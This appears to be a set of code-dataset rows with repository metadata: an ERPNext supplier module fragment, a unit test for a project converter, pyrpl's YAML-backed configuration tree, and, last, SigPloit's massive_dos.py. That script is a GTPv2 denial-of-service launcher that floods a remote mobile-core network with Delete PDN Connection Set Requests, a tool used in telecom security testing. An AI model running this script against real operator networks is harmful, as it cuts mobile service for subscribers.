if nm:
contact_details =frappe.db.convert_to_lists(frappe.db.sql("select name, CONCAT(IFNULL(first_name,''),' ',IFNULL(last_name,'')),contact_no,email_id from `tabContact` where supplier = %s", nm))
return contact_details
else:
return ''
def delete_supplier_address(self):
for rec in frappe.db.sql("select * from `tabAddress` where supplier=%s", (self.name,), as_dict=1):
frappe.db.sql("delete from `tabAddress` where name=%s",(rec['name']))
def delete_supplier_contact(self):
for contact in frappe.db.sql_list("""select name from `tabContact`
where supplier=%s""", self.name):
frappe.delete_doc("Contact", contact)
def on_trash(self):
self.delete_supplier_address()
self.delete_supplier_contact()
def after_rename(self, olddn, newdn, merge=False):
set_field = ''
if frappe.defaults.get_global_default('supp_master_name') == 'Supplier Name':
frappe.db.set(self, "supplier_name", newdn)
self.update_contact()
set_field = ", supplier_name=%(newdn)s"
self.update_supplier_address(newdn, set_field)
def update_supplier_address(self, newdn, set_field):
frappe.db.sql("""update `tabAddress` set address_title=%(newdn)s
{set_field} where supplier=%(newdn)s"""\
.format(set_field=set_field), ({"newdn": newdn}))
@frappe.whitelist()
def get_dashboard_info(supplier):
if not frappe.has_permission("Supplier", "read", supplier):
frappe.throw(_("No permission"))
out = {}
for doctype in ["Supplier Quotation", "Purchase Order", "Purchase Receipt", "Purchase Invoice"]:
out[doctype] = frappe.db.get_value(doctype,
{"supplier": supplier, "docstatus": ["!=", 2] }, "count(*)")
billing_this_year = frappe.db.sql("""
select sum(ifnull(credit_in_account_currency, 0)) - sum(ifnull(debit_in_account_currency, 0))
from `tabGL Entry`
where voucher_type='Purchase Invoice' and party_type = 'Supplier'
and party=%s and fiscal_year = %s""",
(supplier, frappe.db.get_default("fiscal_year")))
total_unpaid = frappe.db.sql("""select sum(outstanding_amount)
from `tabPurchase Invoice`
where supplier=%s and docstatus = 1""", supplier)
out["billing_this_year"] = billing_this_year[0][0] if billing_this_year else 0
out["total_unpaid"] = total_unpaid[0][0] if total_unpaid else 0
out["company_currency"] = frappe.db.sql_list("select distinct default_currency from tabCompany")
return out
| agpl-3.0 | -6,728,424,563,410,634,000 | 35.929204 | 194 | 0.705967 | false |
kublaj/the-maker | sandboxProjectConvert_spec.py | 1 | 4768 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import unittest
import os
import shutil
from makerUpdateSandboxedProjects import UpdateSandboxedProjects as theUpdater
import makerUpdateSandboxedProjects
import sys
from makerUtilities import writeDataToFile, readDataFromFile
import wx
class MakerTest(unittest.TestCase):
def tearMeDown(self):
if os.path.isdir(self.targetDir):
shutil.rmtree(self.targetDir, ignore_errors = True)
def setMeUp(self):
self.user_home = "/Users/maker/"
testProjects = os.path.join(os.getcwd(),"_Testing_")
self.tool = theUpdater()
self.targetDir = self.tool.getConversionTargetDir()
self.sandbox = self.tool.getApplicationSupportDir()
self.oldProjectsDir = os.path.join(self.sandbox, "makerProjects")
self.UIData = {'SplitterSashPosition': 200,
'editorStyle': 'Github',
'sessionFiles': [[u'index_en', '.content', u'Test.makerProject', 0, 'False'],
[u'bootstrap-alert', '.js', u'Test.makerProject', 0, 'False'],
[u'bootstrap-collapse', '.js', u'Test.makerProject', 97, 'True']],
'linkedProjects': [u'/Users/maker/Desktop/Test.makerProject'],
'Position': wx.Point(120, 36), 'Size': wx.Size(1200, 796)}
if os.path.isdir(self.sandbox):
shutil.rmtree(self.sandbox, ignore_errors = True)
shutil.copytree(testProjects, self.oldProjectsDir)
writeDataToFile(self.UIData, os.path.join(self.sandbox,".makerUISettings"))
def test_getCorrectTargetDir(self):
self.setMeUp()
self.assertTrue(self.targetDir.endswith(makerUpdateSandboxedProjects.TARGET_NAME), "Target dir set correct")
self.tearMeDown()
def test_ifNoMakerProjectsDirInSandboxDoNothing(self):
self.setMeUp()
if os.path.isdir(self.oldProjectsDir):
shutil.rmtree(self.oldProjectsDir)
self.tool.update()
self.assertFalse(os.path.isdir(self.targetDir), "There should be no target dir")
self.tearMeDown()
def test_ifNoProjectsInSandboxDoNothing(self):
self.setMeUp()
if os.path.isdir(self.oldProjectsDir):
shutil.rmtree(self.oldProjectsDir)
print "creating empty projects dir"
os.mkdir(os.path.join(self.sandbox, "makerProjects"))
self.assertTrue(os.path.isdir(os.path.join(self.sandbox, "makerProjects")), "Project dir is there...")
self.assertEqual(os.listdir(self.oldProjectsDir), [], "It is empty...")
self.tool.update()
self.assertFalse(os.path.isdir(self.targetDir), "There should be no target dir")
self.tearMeDown()
def test_existingProjectsWillBeConverted(self):
def isProject(project):
if os.path.isdir(os.path.join(project, "parts")):
return True
else:
return False
def getProjectsInSandbox():
projects = []
for item in os.listdir(self.oldProjectsDir):
if not item.startswith(".") and isProject(os.path.join(self.oldProjectsDir, item)):
projects.append(item)
return projects
self.setMeUp()
self.assertNotEqual(os.listdir(self.oldProjectsDir), [], "It is empty...")
print "creating JUNK project..."
junk = "IamNotAProject"
spam = os.path.join(self.oldProjectsDir, junk)
os.mkdir(spam)
self.assertTrue(os.path.isdir(spam), "Junk project is there...")
oldProjects = getProjectsInSandbox()
self.assertTrue("TestProjectOne" in oldProjects, "Old project in list")
self.tool.update()
self.assertTrue(os.path.isdir(self.targetDir), "There should be no target dir")
self.assertFalse(os.path.isdir(self.oldProjectsDir), "There should be no old project dir")
fileInTarget = os.listdir(self.targetDir)
for item in oldProjects:
self.assertTrue(item + ".makerProject" in fileInTarget, "project has been converted and copied")
self.assertFalse(junk + ".makerProject" in fileInTarget, "JUNK project has NOT been converted and copied")
self.tearMeDown()
if __name__=="__main__":
unittest.main()
| gpl-3.0 | -763,920,841,446,810,000 | 31.216216 | 116 | 0.575503 | false |
lneuhaus/pyrpl | pyrpl/memory.py | 1 | 26126 | ###############################################################################
# pyrpl - DSP servo controller for quantum optics with the RedPitaya
# Copyright (C) 2014-2016 Leonhard Neuhaus ([email protected])
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
###############################################################################
import os
from collections import OrderedDict
from shutil import copyfile
import numpy as np
import time
from qtpy import QtCore
from . import default_config_dir, user_config_dir
from .pyrpl_utils import time
import logging
logger = logging.getLogger(name=__name__)
class UnexpectedSaveError(RuntimeError):
pass
# the config file is read through a yaml interface. The preferred one is
# ruamel.yaml, since it allows to preserve comments and whitespace in the
# config file through roundtrips (the config file is rewritten every time a
# parameter is changed). If ruamel.yaml is not installed, the program will
# issue a warning and use pyyaml (=yaml= instead). Comments are lost in this
# case.
try:
raise # disables ruamel support
import ruamel.yaml
#ruamel.yaml.add_implicit_resolver()
ruamel.yaml.RoundTripDumper.add_representer(np.float64,
lambda dumper, data: dumper.represent_float(float(data)))
ruamel.yaml.RoundTripDumper.add_representer(complex,
lambda dumper, data: dumper.represent_str(str(data)))
ruamel.yaml.RoundTripDumper.add_representer(np.complex128,
lambda dumper, data: dumper.represent_str(str(data)))
ruamel.yaml.RoundTripDumper.add_representer(np.ndarray,
lambda dumper, data: dumper.represent_list(list(data)))
#http://stackoverflow.com/questions/13518819/avoid-references-in-pyyaml
#ruamel.yaml.RoundTripDumper.ignore_aliases = lambda *args: True
def load(f):
return ruamel.yaml.load(f, ruamel.yaml.RoundTripLoader)
def save(data, stream=None):
return ruamel.yaml.dump(data, stream=stream,
Dumper=ruamel.yaml.RoundTripDumper,
default_flow_style=False)
except:
logger.debug("ruamel.yaml could not be imported. Using yaml instead. "
"Comments in config files will be lost.")
import yaml
# see http://stackoverflow.com/questions/13518819/avoid-references-in-pyyaml
#yaml.Dumper.ignore_aliases = lambda *args: True # NEVER TESTED
# ordered load and dump for yaml files. From
# http://stackoverflow.com/questions/5121931/in-python-how-can-you-load-yaml-mappings-as-ordereddicts
def load(stream, Loader=yaml.SafeLoader, object_pairs_hook=OrderedDict):
class OrderedLoader(Loader):
pass
def construct_mapping(loader, node):
loader.flatten_mapping(node)
return object_pairs_hook(loader.construct_pairs(node))
OrderedLoader.add_constructor(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
construct_mapping)
return yaml.load(stream, OrderedLoader)
def save(data, stream=None, Dumper=yaml.SafeDumper,
default_flow_style=False,
encoding='utf-8',
**kwds):
class OrderedDumper(Dumper):
pass
def _dict_representer(dumper, data):
return dumper.represent_mapping(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
data.items())
OrderedDumper.add_representer(OrderedDict, _dict_representer)
OrderedDumper.add_representer(np.float64,
lambda dumper, data: dumper.represent_float(float(data)))
OrderedDumper.add_representer(complex,
lambda dumper, data: dumper.represent_str(str(data)))
OrderedDumper.add_representer(np.complex128,
lambda dumper, data: dumper.represent_str(str(data)))
OrderedDumper.add_representer(np.ndarray,
lambda dumper, data: dumper.represent_list(list(data)))
# I added the following two lines to make pyrpl compatible with pyinstruments. In principle they can be erased
if isinstance(data, dict) and not isinstance(data, OrderedDict):
data = OrderedDict(data)
return yaml.dump(data,
stream=stream,
Dumper=OrderedDumper,
default_flow_style=default_flow_style,
encoding=encoding,
**kwds)
# usage example:
# load(stream, yaml.SafeLoader)
# save(data, stream=f, Dumper=yaml.SafeDumper)
def isbranch(obj):
return isinstance(obj, dict) or isinstance(obj, list)
# two functions to locate config files
def _get_filename(filename=None):
""" finds the correct path and name of a config file """
# accidentally, we may pass a MemoryTree object instead of file
if isinstance(filename, MemoryTree):
return filename._filename
# get extension right
if not filename.endswith(".yml"):
filename = filename + ".yml"
# see if filename is found with given path, or in user_config or in default_config
p, f = os.path.split(filename)
for path in [p, user_config_dir, default_config_dir]:
file = os.path.join(path, f)
if os.path.isfile(file):
return file
# file not existing, place it in user_config_dir
return os.path.join(user_config_dir, f)
def get_config_file(filename=None, source=None):
""" returns the path to a valid, existing config file with possible source specification """
# if None is specified, that means we do not want a persistent config file
if filename is None:
return filename
# try to locate the file
filename = _get_filename(filename)
if os.path.isfile(filename): # found a file
p, f = os.path.split(filename)
if p == default_config_dir:
# check whether path is default_config_dir and make a copy in
# user_config_dir in order to not alter original files
dest = os.path.join(user_config_dir, f)
copyfile(filename, dest)
return dest
else:
return filename
# file not existing, try to get it from source
if source is not None:
source = _get_filename(source)
if os.path.isfile(source): # success - copy the source
logger.debug("File " + filename + " not found. New file created from source '%s'. "%source)
copyfile(source,filename)
return filename
# still not returned -> create empty file
with open(filename, mode="w"):
pass
logger.debug("File " + filename + " not found. New file created. ")
return filename
class MemoryBranch(object):
"""Represents a branch of a memoryTree
All methods are preceded by an underscore to guarantee that tab
expansion of a memory branch only displays the available subbranches or
leaves. A memory tree is a hierarchical structure. Nested dicts are
interpreted as subbranches.
Parameters
----------
parent: MemoryBranch
parent is the parent MemoryBranch
branch: str
branch is a string with the name of the branch to create
defaults: list
list of default branches that are used if requested data is not
found in the current branch
Class members
-----------
all properties without preceeding underscore are config file entries
_data: the raw data underlying the branch. Type depends on the
loader and can be dict, OrderedDict or CommentedMap
_dict: similar to _data, but the dict contains all default
branches
_defaults: list of MemoryBranch objects in order of decreasing
priority that are used as defaults for the Branch.
Changing the default values from the software will replace
the default values in the current MemoryBranch but not
alter the underlying default branch. Changing the
default branch when it is not overridden by the current
MemoryBranch results in an effective change in the branch.
_keys: same as _dict._keys()
_update: updates the branch with another dict
_pop: removes a value/subbranch from the branch
_root: the MemoryTree object (root) of the tree
_parent: the parent of the branch
_branch: the name of the branch
_get_or_create: creates a new branch and returns it. Same as branch[newname]=dict(), but also supports nesting,
e.g. newname="lev1.lev2.level3"
_fullbranchname: returns the full path from root to the branch
_getbranch: returns a branch by specifying its path, e.g. 'b1.c2.d3'
_rename: renames the branch
_reload: attempts to reload the data from disc
_save: attempts to save the data to disc
If a subbranch or a value is requested but does not exist in the current MemoryTree, a KeyError is raised.
"""
def __init__(self, parent, branch):
self._parent = parent
self._branch = branch
self._update_instance_dict()
def _update_instance_dict(self):
data = self._data
if isinstance(data, dict):
for k in self.__dict__.keys():
if k not in data and not k.startswith('_'):
self.__dict__.pop(k)
for k in data.keys():
# write None since this is only a
# placeholder (__getattribute__ is overwritten below)
self.__dict__[k] = None
@property
def _data(self):
""" The raw data (OrderedDict) or Mapping of the branch """
return self._parent._data[self._branch]
@_data.setter
def _data(self, value):
logger.warning("You are directly modifying the data of MemoryBranch"
" %s to %s.", self._fullbranchname, str(value))
self._parent._data[self._branch] = value
def _keys(self):
if isinstance(self._data, list):
return range(self.__len__())
else:
return self._data.keys()
def _update(self, new_dict):
if isinstance(self._data, list):
raise NotImplementedError
self._data.update(new_dict)
self._save()
# keep auto_completion up to date
for k in new_dict:
self.__dict__[k] = None
def __getattribute__(self, name):
""" implements the dot notation.
Example: self.subbranch.leaf returns the item 'leaf' of 'subbranch' """
if name.startswith('_'):
return super(MemoryBranch, self).__getattribute__(name)
else:
# convert dot notation into dict notation
return self[name]
def __getitem__(self, item):
"""
__getitem__ bypasses the higher-level __getattribute__ function and provides
direct low-level access to the underlying dictionary.
This is much faster, as long as no changes have been made to the config
file.
"""
self._reload()
# if a subbranch is requested, iterate through the hierarchy
if isinstance(item, str) and '.' in item:
item, subitem = item.split('.', 1)
return self[item][subitem]
else: # otherwise just return what we can find
attribute = self._data[item] # read from the data dict
if isbranch(attribute): # if the object can be expressed as a branch, do so
return MemoryBranch(self, item)
else: # otherwise return whatever we found in the data dict
return attribute
def __setattr__(self, name, value):
if name.startswith('_'):
super(MemoryBranch, self).__setattr__(name, value)
else: # implemment dot notation
self[name] = value
def __setitem__(self, item, value):
"""
creates a new entry, overriding the protection provided by dot notation
if the value of this entry is of type dict, it becomes a MemoryBranch
new values can be added to the branch in the same manner
"""
# if the subbranch is set or replaced, to this in a specific way
if isbranch(value):
# naive way: self._data[item] = dict(value)
# rather: replace values in their natural order (e.g. if value is OrderedDict)
# make an empty subbranch
if isinstance(value, list):
self._set_data(item, [])
subbranch = self[item]
# use standard setter to set the values 1 by 1 and possibly as subbranch objects
for k, v in enumerate(value):
subbranch[k] = v
else: # dict-like
# makes an empty subbranch
self._set_data(item, dict())
subbranch = self[item]
# use standard setter to set the values 1 by 1 and possibly as subbranch objects
for k, v in value.items():
subbranch[k] = v
#otherwise just write to the data dictionary
else:
self._set_data(item, value)
if self._root._WARNING_ON_SAVE or self._root._ERROR_ON_SAVE:
logger.warning("Issuing call to MemoryTree._save after %s.%s=%s",
self._branch, item, value)
self._save()
# update the __dict__ for autocompletion
self.__dict__[item] = None
def _set_data(self, item, value):
"""
helper function to manage setting list entries that do not exist
"""
if isinstance(self._data, list) and item == len(self._data):
self._data.append(value)
else:
# trivial case: _data is dict or item within list length
# and we can simply set the entry
self._data[item] = value
def _pop(self, name):
"""
remove an item from the branch
"""
value = self._data.pop(name)
if name in self.__dict__.keys():
self.__dict__.pop(name)
self._save()
return value
def _rename(self, name):
self._parent[name] = self._parent._pop(self._branch)
self._save()
def _get_or_create(self, name):
"""
creates a new subbranch with name=name if it does not exist already
and returns it. If name is a branch hierarchy such as
"subbranch1.subbranch2.subbranch3", all three subbranch levels
are created
"""
if isinstance(name, int):
if name == 0 and len(self) == 0:
# instantiate a new list - odd way because we must
self._parent._data[self._branch] = []
# if index <= len, creation is done automatically if needed
# otherwise an error is raised
if name >= len(self):
self[name] = dict()
return self[name]
else: # dict-like subbranch, support several sublevels separated by '.'
# chop name into parts and iterate through them
currentbranch = self
for subbranchname in name.split("."):
# make new branch if applicable
if subbranchname not in currentbranch._data.keys():
currentbranch[subbranchname] = dict()
# move into new branch in case another subbranch will be created
currentbranch = currentbranch[subbranchname]
return currentbranch
def _erase(self):
"""
Erases the current branch
"""
self._parent._pop(self._branch)
self._save()
@property
def _root(self):
"""
returns the parent highest in hierarchy (the MemoryTree object)
"""
parent = self
while parent != parent._parent:
parent = parent._parent
return parent
@property
def _fullbranchname(self):
parent = self._parent
branchname = self._branch
while parent != parent._parent:
branchname = parent._branch + '.' + branchname
parent = parent._parent
return branchname
def _reload(self):
""" reload data from file"""
self._parent._reload()
def _save(self):
""" write data to file"""
self._parent._save()
def _get_yml(self, data=None):
"""
:return: returns the yml code for this branch
"""
return save(self._data if data is None else data).decode('utf-8')
def _set_yml(self, yml_content):
"""
:param yml_content: sets the branch to yml_content
:return: None
"""
branch = load(yml_content)
self._parent._data[self._branch] = branch
self._save()
def __len__(self):
return len(self._data)
def __contains__(self, item):
return item in self._data
def __repr__(self):
return "MemoryBranch(" + str(self._keys()) + ")"
def __add__(self, other):
"""
makes it possible to add list-like memory tree to a list
"""
if not isinstance(self._data, list):
raise NotImplementedError
return self._data + other
def __radd__(self, other):
"""
makes it possible to add list-like memory tree to a list
"""
if not isinstance(self._data, list):
raise NotImplementedError
return other + self._data
class MemoryTree(MemoryBranch):
"""
The highest level of a MemoryBranch construct. All attributes of this
object that do not start with '_' are other MemoryBranch objects or
Leaves, i.e. key - value pairs.
Parameters
----------
filename: str
The filename of the .yml file defining the MemoryTree structure.
"""
##### internal load logic:
# 1. initially, call _load() to get the data from the file
# 2. upon each inquiry of the config data, _reload() is called to
# ensure data integrity
# 3. _reload assumes a delay of _loadsavedeadtime between changing the
# config file and Pyrpl requesting the new data. That means, _reload
# will not attempt to touch the config file more often than every
# _loadsavedeadtime. The last interaction time with the file system is
# saved in the variable _lastreload. If this time is far enough in the
# past, the modification time of the config file is compared to _mtime,
# the internal memory of the last modifiation time by pyrpl. If the two
# don't match, the file was altered outside the scope of pyrpl and _load
# is called to reload it.
##### internal save logic:
# this structure will hold the data. Must define it here as immutable
# to overwrite the property _data of MemoryBranch
_data = None
_WARNING_ON_SAVE = False # flag that is used to debug excessive calls to
# save
_ERROR_ON_SAVE = False # Set this flag to true to raise
# Exceptions upon save
def __init__(self, filename=None, source=None, _loadsavedeadtime=3.0):
# never reload or save more frequently than _loadsavedeadtime because
# this is the principal cause of slowing down the code (typ. 30-200 ms)
# for immediate saving, call _save_now, for immediate loading _load_now
self._loadsavedeadtime = _loadsavedeadtime
# first, make sure filename exists
self._filename = get_config_file(filename, source)
if filename is None:
# to simulate a config file, only store data in memory
self._filename = filename
self._data = OrderedDict()
self._lastsave = time()
# create a timer to postpone to frequent savings
self._savetimer = QtCore.QTimer()
self._savetimer.setInterval(self._loadsavedeadtime*1000)
self._savetimer.setSingleShot(True)
self._savetimer.timeout.connect(self._write_to_file)
self._load()
self._save_counter = 0 # cntr for unittest and debug purposes
self._write_to_file_counter = 0 # cntr for unittest and debug purposes
# root of the tree is also a MemoryBranch with parent self and
# branch name ""
super(MemoryTree, self).__init__(self, "")
@property
def _buffer_filename(self):
""" makes a temporary file to ensure modification of config file is atomic (double-buffering like operation...)"""
return self._filename + '.tmp'
def _load(self):
""" loads data from file """
if self._filename is None:
# if no file is used, just ignore this call
return
logger.debug("Loading config file %s", self._filename)
# read file from disc
with open(self._filename) as f:
self._data = load(f)
# store the modification time of this file version
self._mtime = os.path.getmtime(self._filename)
# make sure that reload timeout starts from this moment
self._lastreload = time()
# empty file gives _data=None
if self._data is None:
self._data = OrderedDict()
# update dict of the MemoryTree object
to_remove = []
# remove all obsolete entries
for name in self.__dict__:
if not name.startswith('_') and name not in self._data:
to_remove.append(name)
for name in to_remove:
self.__dict__.pop(name)
# insert the branches into the object __dict__ for auto-completion
self.__dict__.update(self._data)
def _reload(self):
"""
reloads data from file if file has changed recently
"""
# first check if a reload was not performed recently (speed up reasons)
if self._filename is None:
return
# check whether reload timeout has expired
if time() > self._lastreload + self._loadsavedeadtime:
# prepare next timeout
self._lastreload = time()
logger.debug("Checking change time of config file...")
if self._mtime != os.path.getmtime(self._filename):
logger.debug("Loading because mtime %s != filetime %s",
self._mtime)
self._load()
else:
logger.debug("... no reloading required")
def _write_to_file(self):
"""
Immmediately writes the content of the memory tree to file
"""
# stop save timer
if hasattr(self, '_savetimer') and self._savetimer.isActive():
self._savetimer.stop()
self._lastsave = time()
self._write_to_file_counter += 1
logger.debug("Saving config file %s", self._filename)
if self._filename is None:
# skip writing to file if no filename was selected
return
else:
if self._mtime != os.path.getmtime(self._filename):
logger.warning("Config file has recently been changed on your " +
"harddisk. These changes might have been " +
"overwritten now.")
# we must be sure that overwriting config file never destroys existing data.
# security 1: backup with copyfile above
copyfile(self._filename,
self._filename + ".bak") # maybe this line is obsolete (see below)
# security 2: atomic writing such as shown in
# http://stackoverflow.com/questions/2333872/atomic-writing-to-file-with-python:
try:
f = open(self._buffer_filename, mode='w')
save(self._data, stream=f)
f.flush()
os.fsync(f.fileno())
f.close()
os.unlink(self._filename)
os.rename(self._buffer_filename, self._filename)
except:
copyfile(self._filename + ".bak", self._filename)
logger.error("Error writing to file. Backup version was restored.")
raise
# save last modification time of the file
self._mtime = os.path.getmtime(self._filename)
def _save(self, deadtime=None):
"""
A call to this function means that the state of the tree has changed
and needs to be saved eventually. To reduce system load, the delay
between two writes will be at least deadtime (defaults to
self._loadsavedeadtime if None)
"""
if self._ERROR_ON_SAVE:
raise UnexpectedSaveError("Save to config file should not "
"happen now")
if self._WARNING_ON_SAVE:
logger.warning("Save counter has just been increased to %d.",
self._save_counter)
self._save_counter += 1 # for unittest and debug purposes
if deadtime is None:
deadtime = self._loadsavedeadtime
# now write current tree structure and data to file
if self._lastsave + deadtime < time():
self._write_to_file()
else:
# make sure saving will eventually occur by launching a timer
if not self._savetimer.isActive():
self._savetimer.start()
@property
def _filename_stripped(self):
try:
return os.path.split(self._filename)[1].split('.')[0]
except:
return 'default'
| gpl-3.0 | 8,099,003,794,063,674,000 | 39.949843 | 122 | 0.601814 | false |
SigPloiter/SigPloit | gtp/attacks/dos/massive_dos.py | 1 | 5715 | #!/usr/bin/env python
# encoding: utf-8
# massive_dos.py
#
# Copyright 2018 Rosalia d'Alessandro
#
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os
import sys
from optparse import OptionParser
from gtp_v2_core.utilities.configuration_parser import parseConfigs
from commons.message_handler import MessageHandler
from commons.globals import message_queue
__all__ = []
__version__ = 0.1
GTP_PORT = 2123
DEFAULT_MSG_FREQ = 20
DEFAULT_SLEEPTIME = 1
DEBUG = 0
##
## ATTACKING TOOL
##
## @brief Main file to execute the script.
##
## This file can test a DoS attack sending a Delete PDN Connection Set Request
## (101) for a specific FQ-CSID.FQ-CSID is calculated using node type id, mcc, mnc and source ip
## provided in the config file.
##
## Use the -h option to enter the help menu and determine what to do.
##
## Basic usage examples:
## * $ python massive_dos.py -v -c conf_file.cnf [-c conf2.cnf ...] -r <remote ip>
# act as a client connecting to <remote-host-ip>
##
## * $ python massive_dos.py -lv -c conf_file.cnf [-c conf2.cnf ...] -r <remote ip>
##
## act as a server listening on 0.0.0.0 and accepting replies from <remote-host-ip>
##
## Example configuration file: MassiveDos.cnf
## Pre-conditions: known valid FQ-CSID
def main(argv=None):
'''Command line options.'''
program_name = os.path.basename(sys.argv[0])
program_version = "v0.1"
program_version_string = '%%prog %s' % (program_version)
program_license = "Copyright 2017 Rosalia d'Alessandro\
Licensed under the Apache License 2.0\
nhttp://www.apache.org/licenses/LICENSE-2.0"
if argv is None:
argv = sys.argv[1:]
lstn = None
try:
# setup option parser
parser = OptionParser(version=program_version_string, description=program_license)
parser.add_option("-v", "--verbose", dest="verbose", action="count", help="set verbosity level [default: %default]")
parser.add_option("-c", "--config", dest="config_file", help="the configuration file")
parser.add_option("-r", "--remote_net", dest="remote_net",
help="remote network e.g. 10.0.0.0/24, 10.0.0.1/32")
parser.add_option("-l", "--listening", dest = "listening_mode",
action = "count", help = "start also a GTP_C listener")
# set defaults
parser.set_defaults(listening_mode=False,
config_file="../config/MassiveDoS.cnf",
verbose = False)
# process options
(opts, args) = parser.parse_args(argv)
is_verbose = False
listening_mode = opts.listening_mode
msg_freq = DEFAULT_SLEEPTIME
remote_net = opts.remote_net
sleep_time = DEFAULT_SLEEPTIME
if listening_mode and remote_net == None:
print "remote network (e.g. 10.0.0.0/24, 10.0.0.1/32) is required"
return
# MAIN BODY #
if opts.config_file == "" :
print "Error: missed config file"
return
config = parseConfigs(opts.config_file)
msgs = config.get_unpacked_messages()
lstn = MessageHandler(messages = msgs, peer = remote_net,
isVerbose = is_verbose,
listening_mode = listening_mode,
msgs_freq = msg_freq, wait_time = sleep_time)
if lstn :
lstn.daemon = True
lstn.start()
lstn.join()
lstn.stop()
print "Sent %d GTPV2 messages"%len(message_queue)
except Exception, e:
indent = len(program_name) * " "
sys.stderr.write(program_name + ": " + repr(e) + "\n")
sys.stderr.write(indent + " for help use --help")
print "Exception %s"%str(e)
if lstn :
lstn.stop()
return 2
if __name__ == "__main__":
if DEBUG:
sys.argv.append("-v")
sys.exit(main())
| mit | -1,503,131,306,233,485,600 | 37.355705 | 124 | 0.607349 | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.